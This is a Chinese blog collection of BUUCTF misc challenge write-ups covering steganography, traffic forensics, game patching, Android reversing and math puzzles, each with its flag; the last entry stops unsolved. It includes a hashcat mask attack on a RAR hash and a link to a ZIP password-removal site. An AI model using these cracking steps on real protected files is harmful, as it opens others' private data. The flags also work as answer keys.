buuctf-misc4

[GKCTF 2021]0.03

题目描述:

我的真心值三分吗

下载附件

文件名提示disk直接挂载，密码为311223313313112122312312313311

假flag

用ntfsstreamseditor扫描一下文件夹

三分密码

QAZ WSX EDC
RFV TGB YHN
UJM IKO LP/


311 E
223 B
313 C
313 C
112 A
122 F
312 D 
312 D
313 C 
311 E

最后密码为EBCCAFDDCE，挂载磁盘得到flag

最后flag为

flag{85ec0e23-ebbe-4fa7-9c8c-e8b743d0d85c}

[NewStarCTF 公开赛赛道]最后的流量分析

题目描述:

So Easy！分析出黑客获取的机密文件内容！

下载附件

盲注流量

tshark -r sqli.pcap -T fields -Y "http.request.method==GET or frame.len>765" -e "frame.len" -e "http.request.uri.query.parameter" > data.txt

脚本处理

from urllib.parse import *
import re

comment = ''
with open('data.txt') as f:
	lines = f.readlines()
	for i in range(len(lines)):
		if int(lines[i][:3])>765:
			comment += re.findall(r'"(.)"', unquote(lines[i-1]))[0]
print(comment)

最后flag为

flag{c84bb04a-8663-4ee2-9449-349f1ee83e11}

[羊城杯 2020]image_rar

下载附件

改后缀.zip查看

发现65图片不正常，010查看

rar文件，修改为52 61 72 21，解压需要密码

配合john+hashcat爆破

rar2john 65.rar

hashcat.exe -m 13000 -a 3 $rar5$16$a2dce3925af59efb2df9851dbfc24fb1$15$bb005ea8f91bf0356c8dddcfa41ac4cb$8$62293dc5e26e9e7f GW?a?a?a?a
pause

得到密码GW5!3#，解压得到一个叫flag的文件，010查看：

保存为png文件查看

最后flag为

flag{R3fresh_1s_so_Cool}

[QCTF2018]picture

下载附件

带key的lsb隐写 密码为wwjkwywq

des解码

# _*_ coding:utf-8 _*_
 
ip = (58, 50, 42, 34, 26, 18, 10, 2,
 
      60, 52, 44, 36, 28, 20, 12, 4,
 
      62, 54, 46, 38, 30, 22, 14, 6,
 
      64, 56, 48, 40, 32, 24, 16, 8,
 
      57, 49, 41, 33, 25, 17, 9, 1,
 
      59, 51, 43, 35, 27, 19, 11, 3,
 
      61, 53, 45, 37, 29, 21, 13, 5,
 
      63, 55, 47, 39, 31, 23, 15, 7)
 
ip_1 = (40, 8, 48, 16, 56, 24, 64, 32,
 
        39, 7, 47, 15, 55, 23, 63, 31,
 
        38, 6, 46, 14, 54, 22, 62, 30,
 
        37, 5, 45, 13, 53, 21, 61, 29,
 
        36, 4, 44, 12, 52, 20, 60, 28,
 
        35, 3, 43, 11, 51, 19, 59, 27,
 
        34, 2, 42, 10, 50, 18, 58, 26,
 
        33, 1, 41, 9, 49, 17, 57, 25)
 
e = (32, 1, 2, 3, 4, 5, 4, 5,
 
     6, 7, 8, 9, 8, 9, 10, 11,
 
     12, 13, 12, 13, 14, 15, 16, 17,
 
     16, 17, 18, 19, 20, 21, 20, 21,
 
     22, 23, 24, 25, 24, 25, 26, 27,
 
     28, 29, 28, 29, 30, 31, 32, 1)
 
p = (16, 7, 20, 21, 29, 12, 28, 17,
 
     1, 15, 23, 26, 5, 18, 31, 10,
 
     2, 8, 24, 14, 32, 27, 3, 9,
 
     19, 13, 30, 6, 22, 11, 4, 25)
 
s = [[[14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7],
 
      [0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8],
 
      [4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0],
 
      [15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13]],
 
     [[15, 1, 8, 14, 6, 11, 3, 4, 9, 7, 2, 13, 12, 0, 5, 10],
 
      [3, 13, 4, 7, 15, 2, 8, 14, 12, 0, 1, 10, 6, 9, 11, 5],
 
      [0, 14, 7, 11, 10, 4, 13, 1, 5, 8, 12, 6, 9, 3, 2, 15],
 
      [13, 8, 10, 1, 3, 15, 4, 2, 11, 6, 7, 12, 0, 5, 14, 9]],
 
     [[10, 0, 9, 14, 6, 3, 15, 5, 1, 13, 12, 7, 11, 4, 2, 8],
 
      [13, 7, 0, 9, 3, 4, 6, 10, 2, 8, 5, 14, 12, 11, 15, 1],
 
      [13, 6, 4, 9, 8, 15, 3, 0, 11, 1, 2, 12, 5, 10, 14, 7],
 
      [1, 10, 13, 0, 6, 9, 8, 7, 4, 15, 14, 3, 11, 5, 2, 12]],
 
     [[7, 13, 14, 3, 0, 6, 9, 10, 1, 2, 8, 5, 11, 12, 4, 15],
 
      [13, 8, 11, 5, 6, 15, 0, 3, 4, 7, 2, 12, 1, 10, 14, 9],
 
      [10, 6, 9, 0, 12, 11, 7, 13, 15, 1, 3, 14, 5, 2, 8, 4],
 
      [3, 15, 0, 6, 10, 1, 13, 8, 9, 4, 5, 11, 12, 7, 2, 14]],
 
     [[2, 12, 4, 1, 7, 10, 11, 6, 8, 5, 3, 15, 13, 0, 14, 9],
 
      [14, 11, 2, 12, 4, 7, 13, 1, 5, 0, 15, 10, 3, 9, 8, 6],
 
      [4, 2, 1, 11, 10, 13, 7, 8, 15, 9, 12, 5, 6, 3, 0, 14],
 
      [11, 8, 12, 7, 1, 14, 2, 13, 6, 15, 0, 9, 10, 4, 5, 3]],
 
     [[12, 1, 10, 15, 9, 2, 6, 8, 0, 13, 3, 4, 14, 7, 5, 11],
 
      [10, 15, 4, 2, 7, 12, 9, 5, 6, 1, 13, 14, 0, 11, 3, 8],
 
      [9, 14, 15, 5, 2, 8, 12, 3, 7, 0, 4, 10, 1, 13, 11, 6],
 
      [4, 3, 2, 12, 9, 5, 15, 10, 11, 14, 1, 7, 6, 0, 8, 13]],
 
     [[4, 11, 2, 14, 15, 0, 8, 13, 3, 12, 9, 7, 5, 10, 6, 1],
 
      [13, 0, 11, 7, 4, 9, 1, 10, 14, 3, 5, 12, 2, 15, 8, 6],
 
      [1, 4, 11, 13, 12, 3, 7, 14, 10, 15, 6, 8, 0, 5, 9, 2],
 
      [6, 11, 13, 8, 1, 4, 10, 7, 9, 5, 0, 15, 14, 2, 3, 12]],
 
     [[13, 2, 8, 4, 6, 15, 11, 1, 10, 9, 3, 14, 5, 0, 12, 7],
 
      [1, 15, 13, 8, 10, 3, 7, 4, 12, 5, 6, 11, 0, 14, 9, 2],
 
      [7, 11, 4, 1, 9, 12, 14, 2, 0, 6, 10, 13, 15, 3, 5, 8],
 
      [2, 1, 14, 7, 4, 10, 8, 13, 15, 12, 9, 0, 3, 5, 6, 11]]]
 
pc1 = (57, 49, 41, 33, 25, 17, 9,
 
       1, 58, 50, 42, 34, 26, 18,
 
       10, 2, 59, 51, 43, 35, 27,
 
       19, 11, 3, 60, 52, 44, 36,
 
       63, 55, 47, 39, 31, 23, 15,
 
       7, 62, 54, 46, 38, 30, 22,
 
       14, 6, 61, 53, 45, 37, 29,
 
       21, 13, 5, 28, 20, 12, 4)
 
pc2 = (14, 17, 11, 24, 1, 5, 3, 28,
 
       15, 6, 21, 10, 23, 19, 12, 4,
 
       26, 8, 16, 7, 27, 20, 13, 2,
 
       41, 52, 31, 37, 47, 55, 30, 40,
 
       51, 45, 33, 48, 44, 49, 39, 56,
 
       34, 53, 46, 42, 50, 36, 29, 32)
 
d = (1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1)
 
__all__ = ['desdecode']
 
 
class DES:
    """解密函数，DES加密与解密的方法相差不大
        只是在解密的时候所用的子密钥与加密的子密钥相反
    """
 
    def __init__(self):
        pass
 
    def decode(self, string, key, key_len, string_len):
        output = ""
        num = 0
        # 将密文转换为二进制
        code_string = self._functionCharToA(string, string_len)
        # 获取字密钥
        code_key = self._getkey(key, key_len)
 
        # 如果密钥长度不是16的整数倍则以增加0的方式变为16的整数倍
        real_len = (key_len / 16) + 1 if key_len % 16 != 0 else key_len / 16
        trun_len = string_len * 4
        # 对每64位进行一次加密
        for i in range(0, trun_len, 64):
            run_code = code_string[i:i + 64]
            run_key = code_key[int(num % real_len)]
 
            # 64位明文初始置换
            run_code = self._codefirstchange(run_code)
 
            # 16次迭代
            for j in range(16):
                code_r = run_code[32:64]
                code_l = run_code[0:32]
 
                # 64左右交换
                run_code = code_r
 
                # 右边32位扩展置换
                code_r = self._functionE(code_r)
 
                # 获取本轮子密钥
                key_y = run_key[15 - j]
 
                # 异或
                code_r = self._codeyihuo(code_r, key_y)
 
                # S盒代替/选择
                code_r = self._functionS(code_r)
 
                # P转换
                code_r = self._functionP(code_r)
 
                # 异或
                code_r = self._codeyihuo(code_l, code_r)
 
                run_code += code_r
            num += 1
 
            # 32互换
            code_r = run_code[32:64]
            code_l = run_code[0:32]
            run_code = code_r + code_l
 
            # 将二进制转换为16进制、逆初始置换
            output += self._functionCodeChange(run_code)
        return output
 
    # 获取子密钥
    def _getkey(self, key, key_len):
 
        # 将密钥转换为二进制
        code_key = self._functionCharToA(key, key_len)
 
        a = [''] * 16
        real_len = (key_len / 16) * 16 + 16 if key_len % 16 != 0 else key_len
 
        b = [''] * int(real_len / 16)
        for i in range(int(real_len / 16)):
            b[i] = a[:]
        num = 0
        trun_len = 4 * key_len
        for i in range(0, trun_len, 64):
            run_key = code_key[i:i + 64]
            run_key = self._keyfirstchange(run_key)
            for j in range(16):
                key_l = run_key[0:28]
                key_r = run_key[28:56]
                key_l = key_l[d[j]:28] + key_l[0:d[j]]
                key_r = key_r[d[j]:28] + key_r[0:d[j]]
                run_key = key_l + key_r
                key_y = self._functionKeySecondChange(run_key)
                b[num][j] = key_y[:]
            num += 1
 
        return b
 
        # 异或
 
    def _codeyihuo(self, code, key):
        code_len = len(key)
        return_list = ''
        for i in range(code_len):
            if code[i] == key[i]:
                return_list += '0'
            else:
                return_list += '1'
        return return_list
 
    # 密文或明文初始置换
    def _codefirstchange(self, code):
        changed_code = ''
        for i in range(64):
            changed_code += code[ip[i] - 1]
        return changed_code
 
    # 密钥初始置换
    def _keyfirstchange(self, key):
        changed_key = ''
        for i in range(56):
            changed_key += key[pc1[i] - 1]
        return changed_key
 
    # 逆初始置换
    def _functionCodeChange(self, code):
        return_list = ''
        for i in range(16):
            list = ''
            for j in range(4):
                list += code[ip_1[i * 4 + j] - 1]
            return_list += "%x" % int(list, 2)
        return return_list
 
    # 扩展置换
    def _functionE(self, code):
        return_list = ''
        for i in range(48):
            return_list += code[e[i] - 1]
        return return_list
 
        # 置换P
 
    def _functionP(self, code):
        return_list = ''
        for i in range(32):
            return_list += code[p[i] - 1]
        return return_list
 
    # S盒代替选择置换
    def _functionS(self, key):
        return_list = ''
        for i in range(8):
            row = int(str(key[i * 6]) + str(key[i * 6 + 5]), 2)
            raw = int(str(key[i * 6 + 1]) + str(key[i * 6 + 2]) + str(key[i * 6 + 3]) + str(key[i * 6 + 4]), 2)
            return_list += self._functionTos(s[i][row][raw], 4)
 
        return return_list
 
    # 密钥置换选择2
    def _functionKeySecondChange(self, key):
        return_list = ''
        for i in range(48):
            return_list += key[pc2[i] - 1]
        return return_list
 
    # 将十六进制转换为二进制字符串
    def _functionCharToA(self, code, lens):
        return_code = ''
        lens = lens % 16
        for key in code:
            code_ord = int(key, 16)
            return_code += self._functionTos(code_ord, 4)
 
        if lens != 0:
            return_code += '0' * (16 - lens) * 4
        return return_code
 
    # 二进制转换
    def _functionTos(self, o, lens):
        return_code = ''
        for i in range(lens):
            return_code = str(o >> i & 1) + return_code
        return return_code
 
 
# 将unicode字符转换为16进制
def tohex(string):
    return_string = ''
    for i in string:
        return_string += "%02x" % ord(i)
    return return_string
 
 
def tounicode(string):
    return_string = ''
    string_len = len(string)
    for i in range(0, string_len, 2):
        return_string += chr(int(string[i:i + 2], 16))
    return return_string
 
 
# 入口函数
def desdecode(from_code, key):
    key = tohex(key)
 
    des = DES()
 
    key_len = len(key)
    string_len = len(from_code)
    if string_len % 16 != 0:
        return False
    if string_len < 1 or key_len < 1:
        return False
 
    key_code = des.decode(from_code, key, key_len, string_len)
    return tounicode(key_code)
 
 
# 测试
if __name__ == '__main__':
    print(desdecode('e3fab29a43a70ca72162a132df6ab532535278834e11e6706c61a1a7cefc402c8ecaf601d00eee72', 'mtqVwD4JNRjw3bkT9sQ0RYcZaKShU4sf'))

运行得到

最后flag为

flag{eCy0AALMDH9rLoBnWnTigXpYPkgU0sU4}

[XMAN2018排位赛]ppap

下载附件

tcp追踪流

base转图片

base解码第二段

使用这个网站破解密码：https://passwordrecovery.io/zip-file-password-removal/

得到密码：skullandcrossbones

解压得到flag

最后flag为

flag{b31Ng_4_P1r4tE_1s_4lR1GHT_w1Th_M3}

[CFI-CTF 2018]Kadyrov’s Cat

题目描述:

A man from the soviet union has sent you two strange documents. Find the identity of the man as well as his location.
 
Flag format is : CFI{Firstname_Lastname_of_City}

下载附件

查看图片属性发现坐标

在线坐标转换

在线经纬度转换工具_经纬度转度分秒格式_度分秒转经纬度格式 - 一起看地图

24.105078,56.946007

百度地图查看城市

打开message.pdf,在文档属性里找到作者的姓名：Kotik Kadyrov

最后flag为

flag{Kotik_Kadyrov_of_Riga}

[SUCTF2019]protocol

下载附件

foremost分离得到一些图片

返回wireshark中，排长度，从大小为7845开始，提取信息，前十五个（因为图片中前十五个有字）是

04 03 02 01 00 09 08 07 06 05 0e 0d 0c 0b 0a

再从第十六个开始向后数十个（因为有十张黑图）

06 07 0e 04 01 0d 00 02 0b 09

有字的图片的对应大小就是

04 03 02 01 00 09 08 07 06 05 0e 0d 0c 0b 0a

对照有字的图的数据，找出与黑色图片相同数据的位置，即可以找到黑色图片对应的字

第一张是06，那么在有字的图片数据中是第九个，所以对应的就是s（需要镜像）

最后flag为

flag{My_usb_pr0toco1_s0_w3ak}

[*CTF2019]She

下载附件

RPG Maker XP 汉化版下载

新建一个项目，将项目中的Game.rxproj文件放入She游戏文件夹中，再用工具打开这个文件，就可以对游戏进行编辑了

点击 工具 => 数据库 ，把怪物的数值都修改到最小，角色的搞成最大

开挂后，怪鸟就被秒杀了，继续后面的游戏，进入一扇门后一直往右走，会有很多门，房间里面有箱子，但是门打不开，而且碰到面的怪物就死了。

继续开挂，修改游戏数据，选择场景，点击蓝色方块，编辑事件。把怪物删掉

然后我们从第一个门开始打开门，发现打不开然后挨个尝试，按照该顺序获取到的数值是371269（第几个门），按照房间顺序排列得到213697。（第一个门是2，第二个门给的数字是1以此类推）

将213697进行md5加密

最后flag为

flag{d6f3fdffbcb462607878af65d059f274}

[NewStarCTF 2023 公开赛道]隐秘的图片

下载附件

双图异或得到二维码

扫描二维码得到

最后flag为

flag{x0r_1m4ge_w1ll_g0t_fl4ggg_3394e4ecbb53}

[De1CTF2019]Mine Sweeping

下载附件

扫雷游戏

直接破解

用dnspy打开Assembly-CSharp.dll

文件路径：\Mine Sweeping\Mine Sweeping_Data\Managed\

找到使游戏结束的代码段

将this.bIsMine改成false

保存后重新打开游戏，，把所有的块都点开后，会出现一个二维码，（可以下载一个速点器），二维码扫出来是一个网址，打开网址就有flag

最后flag为

flag{G3t_F1@g_AFt3R_Sw3ep1ng_M1n3s} 

[RoarCTF2019]forensic

lovemem一把梭



v

最后flag为

flag{wm_D0uB1e_TC-cRypt}

[*CTF2019]babyflash

下载附件

jPEXS Free Flash Decompiler反编译

MP3文件用Audacity查看频谱图

441张图片，应该是二维码，一张黑色图代表一个1，白色代表一个0，得到二进制数据然后按照21x21遇1填黑色，遇0填白色得到一张二维码

from PIL import Image
import numpy as np
import cv2
import os

path = "C:\\Users\\23831\\Desktop\\images"
flag = []
for i in range(1000):	# 得按顺序
  filepath = path + str(i) + '.bmp'
  if os.path.exists(filepath):
    img = cv2.imread(filepath)
    flag.append(img[0,0,0])		# 黑白位图随便拿一个像素，这里就拿第一个
flag = np.array(flag,np.uint8).reshape(21,21)
Image.fromarray(flag).save('C:\\Users\\23831\\Desktop\\images\\flag.bmp')	

扫描二维码得到

*ctf{half_flag_&

最后flag为

flag{halfflag&&_the_rest}

[网鼎杯 2020 青龙组]虚幻2

解法请看

https://www.bilibili.com/video/BV1AK4y1t7T1/?t=997

[网鼎杯2020-青龙组]部分题解+笔记（未完成） – 「配枪朱丽叶。」

[NewStarCTF 2023 公开赛道]机密图片

zsteg一把梭

[NewStarCTF 2023 公开赛道]阳光开朗大男孩

下载附件

secret.txt

法治自由公正爱国公正敬业法治和谐平等友善敬业法治富强公正民主法治和谐法治和谐法治法治公正友善敬业法治文明公正自由平等诚信平等公正敬业法治和谐平等友善敬业法治和谐和谐富强和谐富强和谐富强平等友善敬业公正爱国和谐自由法治文明公正自由平等友善敬业法治富强和谐自由法治和谐法治和谐法治和谐法治法治和谐富强法治文明公正自由公正自由公正自由公正自由

核心价值观解码

flag.txt

🙃💵🌿🎤🚪🌏🐎🥋🚫😆😍🌊⏩🔬🚹✉☀☺🚹🐅🎤🛩💵🌿🌊🚰😊🌊✉🐎❓🎈🌉👑🎅📮🥋👣🕹🚪☀🔄🚫🐍❓🐍😊☀🔬🍍🤣🎈🥋🙃👑🌏🐎🌊📮😂💵🏹👉❓😇🍴💧☺💵😁☃👉🎅👁☂🌿👉🍴🌪👌🍴🍵🖐😇🍍😀🗒🗒

emjio-aes解码

最后flag为

flag{3m0ji_1s_s0000_1nt3rest1ng_0861aada1050}

[NewStarCTF 2023 公开赛道]CyberChef’s Secret

下载附件

来签到吧！下面这个就是flag，不过它看起来好像怪怪的:-)
M5YHEUTEKFBW6YJWKZGU44CXIEYUWMLSNJLTOZCXIJTWCZD2IZRVG4TJPBSGGWBWHFMXQTDFJNXDQTA=

赛博厨子一把梭

最后flag为

flag{Base_15_S0_Easy_^_^}

[b01lers2020]image_adjustments

下载附件

高度随机变换，需要进行还原，还原时可以利用红色部分进行对齐

#!/usr/bin/env python3

from PIL import Image
from random import randint

f = 'E:\\脚本合集\\misc\\buuctf misc\\红线对齐\\123.png'

img = Image.open(f)

print('Width: {}\n'.format(img.size[0]))
print('Height: {}\n'.format(img.size[1]))

pixels = img.load()
for r in range(img.size[0]):
    backup_row = []
    for c in range(img.size[1]):
        backup_row += [pixels[r,c]]

    start = randint(0, img.size[1])
    done = False
    for i in range(0, img.size[1]):
        if done:
            break
        for c in range(img.size[1]):
            pixels[r, (c + i) % img.size[1]] = backup_row[c]
            if(pixels[r, 163] == (255, 0, 0, 255) and pixels[r, 171] == (255, 0, 0, 255) and pixels[r, 175] == (255, 255, 255, 255) and pixels[r, 150] == (255, 255, 255, 255)):
                done = True
                print("Done: {}".format(r))

img.save('E:\\脚本合集\\misc\\buuctf misc\\红线对齐\\flag.png')

运行得到

最后flag为

flag{ShuFfLiNg_Fl4gs}

[GKCTF 2021]银杏岛の奇妙冒险

下载附件

游戏题，直接找文件信息

….省略

最后flag为

flag{w3lc0me_t0_9kctf_2021_Check_1n}

静静听这么好听的歌

下载附件

给的txt文件是matlab脚本，是把一个bmp的位图写进wav文件里

fid=fopen('33.wav','rb');
a=fread(fid,inf,'uchar');
n=length(a)-44;
fclose(fid);
io=imread('kkk.bmp');
[row col]=size(io);
wi=io(:);
if row*col>n
 error('文件太小');
end
watermarkedaudio=a;
watermarklength=row*col;
for k=1:row*col
 watermarkedaudio(44+k)=bitset(watermarkedaudio(44+k),1,wi(k));
end
figure;
subplot(2,1,1);plot(a);
subplot(2,1,2);plot(watermarkedaudio);
fid = fopen('2.wav', 'wb');
fwrite(fid,watermarkedaudio,'uchar');
fclose(fid);

用脚本解出原图

import numpy as np
from PIL import Image

wav = open('E:\\脚本合集\\misc\\buuctf misc\\lsb音频\\a.wav','rb')
content = wav.read()
wav.close()

bins = []
for i in range(45,45+388*100):
    bins.append(255 if int(bin(content[i])[-1:]) else 0)#为非0数据就添加255，否则添加0，bin:返回整数的二进制
flag = np.array(bins,np.uint8).reshape(388,100)#使bins以uint8的类型进行存储，设置宽为388，高为100
flag = np.flipud(flag)#将图片镜像翻转
imgg = Image.fromarray(flag).save('E:\\脚本合集\\misc\\buuctf misc\\lsb音频\\res.bmp')

运行得到

最后flag为

flag{dce97bd455ae1a00faaebd31c57e7d47}

[INSHack2018]GCorp - Stage 1

tcp追踪流

base解码

最后flag为

flag{c1807a0b6d7713274d7bf3c6477562ac47570e452f77b7d202b81e149172d6a7}

[NewStarCTF 2023 公开赛道]大怨种

gif提取帧

汉信码扫描

最后flag为

flag{1_d0nt_k0nw_h0w_to_sc4n_th1s_c0d3_acef808a868e}

[SWPU2019]Android1

安卓逆向

关键代码

char *Aa(void)
{
  int i; // [xsp+1Ch] [xbp-14h]
  char v2[4]; // [xsp+20h] [xbp-10h] BYREF
  int v3; // [xsp+24h] [xbp-Ch]
  __int64 v4; // [xsp+28h] [xbp-8h]

  v4 = *(_QWORD *)(_ReadStatusReg(ARM64_SYSREG(3, 3, 13, 0, 2)) + 40);
  v3 = 5068641;
  for ( i = 0; i <= 2; ++i )
    v2[i] = *((_BYTE *)&v3 + i) ^ 0x38;
  _ReadStatusReg(ARM64_SYSREG(3, 3, 13, 0, 2));
  return v2;
}

char *aA(void)
{
  int i; // [xsp+1Ch] [xbp-14h]
  char v2[4]; // [xsp+20h] [xbp-10h] BYREF
  int v3; // [xsp+24h] [xbp-Ch]
  __int64 v4; // [xsp+28h] [xbp-8h]

  v4 = *(_QWORD *)(_ReadStatusReg(ARM64_SYSREG(3, 3, 13, 0, 2)) + 40);
  v3 = 4281925;
  for ( i = 0; i <= 2; ++i )
    v2[i] = *((_BYTE *)&v3 + i) ^ 0x24;
  _ReadStatusReg(ARM64_SYSREG(3, 3, 13, 0, 2));
  return v2;
}

char *aa(void)
{
  int i; // [xsp+1Ch] [xbp-14h]
  char v2[4]; // [xsp+20h] [xbp-10h] BYREF
  int v3; // [xsp+24h] [xbp-Ch]
  __int64 v4; // [xsp+28h] [xbp-8h]

  v4 = *(_QWORD *)(_ReadStatusReg(ARM64_SYSREG(3, 3, 13, 0, 2)) + 40);
  v3 = 5398339;
  for ( i = 0; i <= 2; ++i )
    v2[i] = *((_BYTE *)&v3 + i) ^ 0x37;
  _ReadStatusReg(ARM64_SYSREG(3, 3, 13, 0, 2));
  return v2;
}

char *AA(void)
{
  int i; // [xsp+18h] [xbp-18h]
  char v2[4]; // [xsp+1Ch] [xbp-14h] BYREF
  char v3[8]; // [xsp+20h] [xbp-10h] BYREF
  __int64 v4; // [xsp+28h] [xbp-8h]

  v4 = *(_QWORD *)(_ReadStatusReg(ARM64_SYSREG(3, 3, 13, 0, 2)) + 40);
  strcpy(v3, "5D$#");
  for ( i = 0; i <= 3; ++i )
    v2[i] = v3[i] ^ 0x77;
  _ReadStatusReg(ARM64_SYSREG(3, 3, 13, 0, 2));
  return v2;
}

每个函数的v3与对应的十六进制数异或得到的字符串

Aa = "MWa"
aA = "AVE"
aa = "R_C"
AA = "#$D5"
res = []
for v in AA:
    res.append(chr(ord(v) ^ 0x77))
for v in aa:
    res.append(chr(ord(v) ^ 0x37))
for v in aA:
    res.append(chr(ord(v) ^ 0x24))
for v in Aa:
    res.append(chr(ord(v) ^ 0x38))
for v in res[::-1]:
    print(v,end="")

最后flag为

flag{YouaretheB3ST}

[RCTF2019]printer

打印机流量

请看

从一道题学习打印机流量(RCTF2019-Printer)_rctf2019]printer-CSDN博客

[NewStarCTF 2023 公开赛道]新建Word文档

下载附件

找到新佛曰

解码

最后flag为

flag{Th1s_F0_1s_s00_Cyp3r_495586e3df3a}

[watevrCTF 2019]Polly

-510233931851656757*x**56/710998587804863451854045647463724949736497978881168458687447040000000000000 + 28538582555324529581*x**55/25392806707316551851930201695133033919160642102898873524551680000000000000 - 361611288555263491*x**54/421055535502492258043032818391295177534479825940370161664000000000000 + 2189223797409040145903*x**53/5129859940872030677157616504067279579628412546040176469606400000000000 - 3001755643562030554208767*x**52/19357962041026530857198552845536904074069481305811986677760000000000000 + 78238787580756843015401*x**51/1781188998990295441405829301208769237584604463177400320000000000000 - 116104436553238240592813791*x**50/11496527230247656900485565886772482623174748513067073536000000000000 + 127279887341335237997305957*x**49/65694441315700896574203233638699900703855705788954705920000000000 - 20305349569334865003353693141*x**48/64170394447571083344765063383345446352972606387257344000000000000 + 755344461848261566273335985217*x**47/16909766104427515205715118053719408160580619250696192000000000000 - 8730828190255482707329907709523*x**46/1583041933180448232024394030560965870352228185171558400000000000 + 76555149545632714960652198194597*x**45/127331633755818662141092563327729863484853136633364480000000000 - 1602375720398047527703588216319184983*x**44/27479475110939521552978869398000199787640242135105536000000000000 + 114295162137526589722365996075069211717*x**43/22572425983986035561375499862643021254133056039550976000000000000 - 13848681865733026134505571948717935637*x**42/34996009277497729552520154825803133727338071379148800000000000 + 153346974308020314565759178978111441*x**41/5485267911833499929862093232884503719018506485760000000000 - 520024520896904430645934556087134499251423*x**40/290210808642664098728215918067635743104754738266112000000000000 + 583372437848702106759949552819801879184581*x**39/5580977089282001898619536885916071982783744966656000000000000 - 46031013908208473758789005123614987736509587*x**38/8272977802935673402659548795593236115655904303513600000000000 + 7353657867840940108498978410191786786833213*x**37/27150699353263793020311260526078188024353353891840000000000 - 92499773752352276492046888338669680452103462189*x**36/7657889561176967262139073481714360724817612636160000000000000 + 4100551582505375935469899571343423946185109603489*x**35/8296047024608381200650662938523890785219080355840000000000000 - 1895954357110172205089772212408286791708615900917*x**34/102036942013899875729927939885587961529432539136000000000000 + 43118050173835025743884479345094473671998423653*x**33/67129567114407812980215749924728922058837196800000000000 - 22765966699209423168314620580071311613337850078228970157*x**32/1114243406791786642970813103550620539901403327365120000000000000 + 2164682230392596021581197470695955891436192181935306391*x**31/3617673398674631957697445141398118636043517296640000000000000 - 920699702649221064972928655611480860602416008467275417*x**30/57052913814223586429637127677963161285274107904000000000000 + 686056125302514633652788467458025065050820545750401507*x**29/1711587414426707592889113830338894838558223237120000000000 - 3138304869574821781724911760498738183508227936479448972609*x**28/342317482885341518577822766067778967711644647424000000000000 + 1270675513242488953141124524513884117237971552020405481903*x**27/6583028517025798434188899347457287840608550912000000000000 - 35251878159156858646651490873547468067999378927697697003224477*x**26/9428213442084348517445341645428327645319566616166400000000000 + 640581045258286772319400657438117285194045922802459043053203*x**25/9620625961310559711678920046355436372775067975680000000000 - 72656459972106788902891971241582058202821865848124369081172639*x**24/66716462086011457208029806848269051769244352512000000000000 + 154039473157326645352130477125406816808322554770621702623189519*x**23/9427326164327705909830298793777148619567136768000000000000 - 1082910009287427089558040173029448590098449209287440350613671*x**22/4822161720883737038276367669451226915379609600000000000 + 24188920823778246702349239533423129779289240972762319245699197*x**21/8570296513025187190754817085251953290515578880000000000 - 2312064026649698678901994207690698059469649821996032406197587664228741*x**20/71419066189405618046396886086957233654685736370176000000000000 + 862370556128011088565191676373092759230061876592574879284609935706793*x**19/2550680935335914930228460217391329773381633441792000000000000 - 32072107483702086982352528206453150709858865925578274033380368180437*x**18/10002670334650646785209647911338548130908366438400000000000 + 1529698138827681013559573339316154298621053459717691815776842419379*x**17/55570390748059148806720266174103045171713146880000000000 - 222611348623707141383036923098732823232255364898093370342989110678452081*x**16/1044260259473944837992951668521686390518442885120000000000000 + 19351471406694225111369749822067705924291211128650839886054241035573*x**15/13048686203253171864759230125976987935703040000000000000 - 788448884149338619773551061237815179858025448137798058040565357883017969*x**14/85480045326791055697402842485438742223090876416000000000000 + 1073836757430890424151052096696872926581023064319957457780403520628397*x**13/21054198356352476772759320809221365079579033600000000000 - 13037261936583491232564987358021148191312145269662640728042654537466177*x**12/52337322240932848864901859644270462537564160000000000000 + 193553176960028089077524490434690010049391798907017144709511622501501*x**11/181523857324358216783809467780676473323520000000000000 - 68187858129806282947338026458215966993811977794098721136854363544114709*x**10/17205436276727086314158740721145118396514304000000000000 + 8945934592679151193925448392874011400632217576523903097012117504044751*x**9/707334602487669104026526007424854867412254720000000000 - 1869710221567968463761175994053678221652715546983576126590166640405599343*x**8/54712331502421205196451786674312523994337902592000000000 + 150097834583670559919903774847355537654811358204762610127392287652832711*x**7/1954011839372185899873278095511161571226353664000000000 - 887795495236087230655513134787312551397755543548982957604351894153*x**6/6324332742830674887191952972548659841433600000000 + 325850556958534026053020666873255701298636569528110069255986051*x**5/1611756757211697568252622935684799553945600000 - 1383255113415521659958099444243664043564187251342510179583421*x**4/6303358038091792437823864786842855398400000 + 1288933044552801369576288324542563196552750611910520778643*x**3/7696407860917939484522423427158553600000 - 58143815812249254268696937296354052881595701176023*x**2/732857216672564586715802770080000 + 76949958412245985708257714245417562997*x/4439171857433454741600 + 119

x=0时得到119，对应的ascii码字符是w，所以flag应该就是把x从0开始，把计算结果转换成字符

import sympy

flag = ""
x = sympy.symbols('x')#声明变量，以供使用数学表达式
y = eval(open("E:\\脚本合集\\misc\\buuctf misc\\attachment.txt","r").read())#把字符串当成算术表达式，返回结果
for i in range(57):
    flag += chr(y.subs(x,i))#给x赋值i

print(flag)

运行得到

最后flag为

flag{polly_polynomials_youtube.com/watch?v=THNWVVn9JO0}

[INSHack2019]Crunchy

参考

https://blog.csdn.net/caozhk/article/details/53407845

大佬脚本

n = 17665922529512695488143524113273224470194093921285273353477875204196603230641896039854934719468650093602325707751568
m = 100000007

def getSequencePeriod(m):
    s = []
    s.append(0)
    s.append(1)
    for i in range(2, m*6):
        s.append((6 * s[i-1] + s[i-2]) % m)
        if (s[i] == 1 and s[i-1] == 0):
            break
    return s

def getFibonacciRest(n, m):
    s = getSequencePeriod(m)
    period = len(s) - 2
    val = n % period
    return(s[val])

print(getFibonacciRest(n,m))

最后flag为

flag{41322239}

Weird_List

下载附件

[120]
[120]
[24, 1, 87, 1, 7]
[7, 1, 15, 1, 21, 1, 16, 1, 49, 1, 7]
[2, 1, 1, 1, 2, 1, 15, 1, 4, 1, 3, 1, 1, 1, 10, 1, 16, 1, 4, 1, 1, 1, 2, 1, 1, 1, 19, 1, 7, 1, 1, 1, 2, 1, 1, 1, 3, 1, 6]
